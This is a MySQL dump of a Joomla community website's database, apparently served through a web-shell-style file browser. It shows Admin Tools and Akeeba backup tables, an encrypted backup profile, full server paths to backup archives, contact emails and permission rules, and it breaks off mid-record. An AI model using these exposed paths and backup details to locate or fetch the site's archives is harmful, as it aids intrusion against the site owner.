0byt3m1n1
Path:
/
data
/
57
/
5
/
137
/
74
/
5137726
/
meta
/
6174087
/
mysql.backup
/
[
Home
]
File: hallcrestheights_cms.mysqlcluster25.bak.sql
-- MySQL dump 10.13 Distrib 5.6.24, for Linux (x86_64) -- -- Host: mysqlcluster25 Database: hallcrestheights_cms -- ------------------------------------------------------ -- Server version 5.6.39-83.1-56-log /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `jos_admintools_acl` -- DROP TABLE IF EXISTS `jos_admintools_acl`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_acl` ( `user_id` bigint(20) unsigned NOT NULL, `permissions` mediumtext, PRIMARY KEY (`user_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_acl` -- LOCK TABLES `jos_admintools_acl` WRITE; /*!40000 ALTER TABLE `jos_admintools_acl` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_acl` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_adminiplist` -- DROP TABLE IF EXISTS `jos_admintools_adminiplist`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_adminiplist` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `ip` varchar(255) DEFAULT NULL, `description` varchar(255) DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_adminiplist` -- LOCK TABLES `jos_admintools_adminiplist` WRITE; /*!40000 ALTER TABLE `jos_admintools_adminiplist` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_adminiplist` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_badwords` -- DROP TABLE IF EXISTS `jos_admintools_badwords`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_badwords` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `word` varchar(255) DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_badwords` -- LOCK TABLES `jos_admintools_badwords` WRITE; /*!40000 ALTER TABLE `jos_admintools_badwords` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_badwords` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_customperms` -- DROP TABLE IF EXISTS `jos_admintools_customperms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_customperms` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `path` varchar(255) NOT NULL, `perms` varchar(4) DEFAULT '0644', UNIQUE KEY `id` (`id`), KEY `path` (`path`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_customperms` -- LOCK TABLES `jos_admintools_customperms` WRITE; /*!40000 ALTER TABLE `jos_admintools_customperms` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_customperms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_filescache` -- DROP TABLE IF EXISTS `jos_admintools_filescache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_filescache` ( `admintools_filescache_id` bigint(20) NOT NULL AUTO_INCREMENT, `path` varchar(2048) NOT NULL, `filedate` int(11) NOT NULL DEFAULT '0', `filesize` int(11) NOT NULL DEFAULT '0', `data` blob, `checksum` varchar(32) NOT NULL DEFAULT '', PRIMARY KEY (`admintools_filescache_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_filescache` -- LOCK TABLES `jos_admintools_filescache` WRITE; /*!40000 ALTER TABLE `jos_admintools_filescache` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_filescache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_ipautoban` -- DROP TABLE IF EXISTS `jos_admintools_ipautoban`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_ipautoban` ( `ip` varchar(255) NOT NULL, `reason` varchar(255) DEFAULT 'other', `until` datetime DEFAULT NULL, UNIQUE KEY `ip` (`ip`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_ipautoban` -- LOCK TABLES `jos_admintools_ipautoban` WRITE; /*!40000 ALTER TABLE `jos_admintools_ipautoban` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_ipautoban` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_ipblock` -- DROP TABLE IF EXISTS `jos_admintools_ipblock`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_ipblock` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `ip` varchar(255) DEFAULT NULL, `description` varchar(255) DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_ipblock` -- LOCK TABLES `jos_admintools_ipblock` WRITE; /*!40000 ALTER TABLE `jos_admintools_ipblock` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_ipblock` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_log` -- DROP TABLE IF EXISTS `jos_admintools_log`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_log` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `logdate` datetime NOT NULL, `ip` varchar(40) DEFAULT NULL, `url` varchar(255) DEFAULT NULL, `reason` varchar(255) DEFAULT 'other', `extradata` mediumtext, UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_log` -- LOCK TABLES `jos_admintools_log` WRITE; /*!40000 ALTER TABLE `jos_admintools_log` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_log` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_profiles` -- DROP TABLE IF EXISTS `jos_admintools_profiles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_profiles` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `description` varchar(255) NOT NULL, `configuration` longtext, `filters` longtext, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_profiles` -- LOCK TABLES `jos_admintools_profiles` WRITE; /*!40000 ALTER TABLE `jos_admintools_profiles` DISABLE KEYS */; INSERT INTO `jos_admintools_profiles` VALUES (1,'Default PHP Change Scanner Profile','',''); /*!40000 ALTER TABLE `jos_admintools_profiles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_redirects` -- DROP TABLE IF EXISTS `jos_admintools_redirects`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_redirects` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `source` varchar(255) DEFAULT NULL, `dest` varchar(255) DEFAULT NULL, `ordering` bigint(20) NOT NULL DEFAULT '0', `published` tinyint(1) NOT NULL DEFAULT '1', `keepurlparams` tinyint(1) NOT NULL DEFAULT '1', UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_redirects` -- LOCK TABLES `jos_admintools_redirects` WRITE; /*!40000 ALTER TABLE `jos_admintools_redirects` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_redirects` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_scanalerts` -- DROP TABLE IF EXISTS `jos_admintools_scanalerts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_scanalerts` ( `admintools_scanalert_id` bigint(20) NOT NULL AUTO_INCREMENT, `path` varchar(2048) NOT NULL, `scan_id` bigint(20) NOT NULL DEFAULT '0', `diff` mediumtext, `threat_score` int(11) NOT NULL DEFAULT '0', `acknowledged` tinyint(4) NOT NULL DEFAULT '0', PRIMARY KEY (`admintools_scanalert_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_scanalerts` -- LOCK TABLES `jos_admintools_scanalerts` WRITE; /*!40000 ALTER TABLE `jos_admintools_scanalerts` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_scanalerts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_scans` -- DROP TABLE IF EXISTS `jos_admintools_scans`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_scans` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `description` varchar(255) NOT NULL, `comment` longtext, `backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', `backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', `status` enum('run','fail','complete') NOT NULL DEFAULT 'run', `origin` varchar(30) NOT NULL DEFAULT 'backend', `type` varchar(30) NOT NULL DEFAULT 'full', `profile_id` bigint(20) NOT NULL DEFAULT '1', `archivename` longtext, `absolute_path` longtext, `multipart` int(11) NOT NULL DEFAULT '0', `tag` varchar(255) DEFAULT NULL, `filesexist` tinyint(3) NOT NULL DEFAULT '1', `remote_filename` varchar(1000) DEFAULT NULL, `total_size` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `idx_fullstatus` (`filesexist`,`status`), KEY `idx_stale` (`status`,`origin`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_scans` -- LOCK TABLES `jos_admintools_scans` WRITE; /*!40000 ALTER TABLE `jos_admintools_scans` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_scans` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_storage` -- DROP TABLE IF EXISTS `jos_admintools_storage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_storage` ( `key` varchar(255) NOT NULL, `value` longtext NOT NULL, PRIMARY KEY (`key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_storage` -- LOCK TABLES `jos_admintools_storage` WRITE; /*!40000 ALTER TABLE `jos_admintools_storage` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_storage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_admintools_wafexceptions` -- DROP TABLE IF EXISTS `jos_admintools_wafexceptions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_admintools_wafexceptions` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `option` varchar(255) DEFAULT NULL, `view` varchar(255) DEFAULT NULL, `query` varchar(255) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_admintools_wafexceptions` -- LOCK TABLES `jos_admintools_wafexceptions` WRITE; /*!40000 ALTER TABLE `jos_admintools_wafexceptions` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_admintools_wafexceptions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_ak_profiles` -- DROP TABLE IF EXISTS `jos_ak_profiles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_ak_profiles` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `description` varchar(255) NOT NULL, `configuration` longtext, `filters` longtext, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_ak_profiles` -- LOCK TABLES `jos_ak_profiles` WRITE; /*!40000 ALTER TABLE `jos_ak_profiles` DISABLE KEYS */; INSERT INTO `jos_ak_profiles` VALUES (1,'Default Backup Profile','###AES128###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',''); /*!40000 ALTER TABLE `jos_ak_profiles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_ak_stats` -- DROP TABLE IF EXISTS `jos_ak_stats`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_ak_stats` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `description` varchar(255) NOT NULL, `comment` longtext, `backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', `backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', `status` enum('run','fail','complete') NOT NULL DEFAULT 'run', `origin` varchar(30) NOT NULL DEFAULT 'backend', `type` varchar(30) NOT NULL DEFAULT 'full', `profile_id` bigint(20) NOT NULL DEFAULT '1', `archivename` longtext, `absolute_path` longtext, `multipart` int(11) NOT NULL DEFAULT '0', `tag` varchar(255) DEFAULT NULL, `filesexist` tinyint(3) NOT NULL DEFAULT '1', `remote_filename` varchar(1000) DEFAULT NULL, `total_size` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`id`), KEY `idx_fullstatus` (`filesexist`,`status`), KEY `idx_stale` (`status`,`origin`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_ak_stats` -- LOCK TABLES `jos_ak_stats` WRITE; /*!40000 ALTER TABLE `jos_ak_stats` DISABLE KEYS */; INSERT INTO `jos_ak_stats` VALUES (1,'Backup taken on Monday, 25 November 2013 15:59','','2013-11-25 20:59:57','2013-11-25 21:01:41','complete','backend','full',1,'site-hallcrestheights.org-20131125-155957.jpa','/data/15/3/44/58/3044873/user/3391478/htdocs/administrator/components/com_akeeba/backup/site-hallcrestheights.org-20131125-155957.jpa',1,'backend',1,NULL,96220605),(2,'Backup taken on Saturday, 30 November 2013 15:50','','2013-11-30 20:50:34','0000-00-00 00:00:00','fail','backend','full',1,'site-hallcrestheights.org-20131130-155034.jpa','/data/15/3/44/58/3044873/user/3391478/htdocs/administrator/components/com_akeeba/backup/site-hallcrestheights.org-20131130-155034.jpa',0,'backend',1,'',0),(3,'Backup taken on Saturday, 30 November 2013 15:51','','2013-11-30 20:51:57','2013-11-30 20:53:47','complete','backend','full',1,'site-hallcrestheights.org-20131130-155157.zip','/data/15/3/44/58/3044873/user/3391478/htdocs/administrator/components/com_akeeba/backup/site-hallcrestheights.org-20131130-155157.zip',1,'backend',1,NULL,97434130); /*!40000 ALTER TABLE `jos_ak_stats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_ak_storage` -- DROP TABLE IF EXISTS `jos_ak_storage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_ak_storage` ( `tag` varchar(255) NOT NULL, `lastupdate` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `data` longtext, PRIMARY KEY (`tag`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_ak_storage` -- LOCK TABLES `jos_ak_storage` WRITE; /*!40000 ALTER TABLE `jos_ak_storage` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_ak_storage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_alfcontact` -- DROP TABLE IF EXISTS `jos_alfcontact`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_alfcontact` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL, `email` varchar(255) NOT NULL, `prefix` varchar(255) NOT NULL, `extra` text NOT NULL, `defsubject` varchar(255) NOT NULL, `ordering` int(11) NOT NULL, `access` tinyint(3) unsigned NOT NULL, `language` char(7) NOT NULL, `published` tinyint(1) NOT NULL DEFAULT '1', PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_alfcontact` -- LOCK TABLES `jos_alfcontact` WRITE; /*!40000 ALTER TABLE `jos_alfcontact` DISABLE KEYS */; INSERT INTO `jos_alfcontact` VALUES (1,'Sales','sales@mysite.com','[Sales]','Client No:\nOrder No:\nItem No:','Order inquiry',1,1,'en-GB',0),(3,'Webmaster','info@hallcrestheights.org','[Webmaster]','','',3,1,'*',1),(4,'Support','support1@mysite.com\nsupport2@mysite.com\nsupport3@mysite.com','[Support]','','Question',4,2,'*',0); /*!40000 ALTER TABLE `jos_alfcontact` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_assets` -- DROP TABLE IF EXISTS `jos_assets`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_assets` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `parent_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set parent.', `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.', `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.', `name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n', `title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_asset_name` (`name`), KEY `idx_lft_rgt` (`lft`,`rgt`), KEY `idx_parent_id` (`parent_id`) ) ENGINE=InnoDB AUTO_INCREMENT=81 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_assets` -- LOCK TABLES `jos_assets` WRITE; /*!40000 ALTER TABLE `jos_assets` DISABLE KEYS */; INSERT INTO `jos_assets` VALUES (1,0,1,498,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":{\"6\":1},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,1,2,1,'com_admin','com_admin','{}'),(3,1,3,6,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,7,8,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,9,10,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,11,12,1,'com_config','com_config','{}'),(7,1,13,16,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,17,66,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,67,68,1,'com_cpanel','com_cpanel','{}'),(10,1,69,70,1,'com_installer','com_installer','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1},\"core.delete\":[],\"core.edit.state\":[]}'),(11,1,71,72,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,73,74,1,'com_login','com_login','{}'),(13,1,75,76,1,'com_mailto','com_mailto','{}'),(14,1,77,78,1,'com_massmail','com_massmail','{}'),(15,1,79,80,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),(16,1,81,82,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,83,84,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,85,92,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,93,96,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(20,1,97,98,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,99,100,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,101,102,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,103,104,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,105,106,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.own\":{\"6\":1},\"core.edit.state\":[]}'),(25,1,107,110,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(26,1,111,112,1,'com_wrapper','com_wrapper','{}'),(27,8,18,41,2,'com_content.category.2','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(28,3,4,5,2,'com_banners.category.3','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(29,7,14,15,2,'com_contact.category.4','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(30,19,94,95,2,'com_newsfeeds.category.5','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(31,25,108,109,2,'com_weblinks.category.6','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(33,1,466,467,1,'com_rsform','rsform','{}'),(34,1,468,469,1,'com_jce','jce','{}'),(36,1,470,471,1,'com_xmap','com_xmap','{}'),(37,27,19,20,3,'com_content.article.1','Hallcrest Heights','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(38,27,21,22,3,'com_content.article.2','Work In 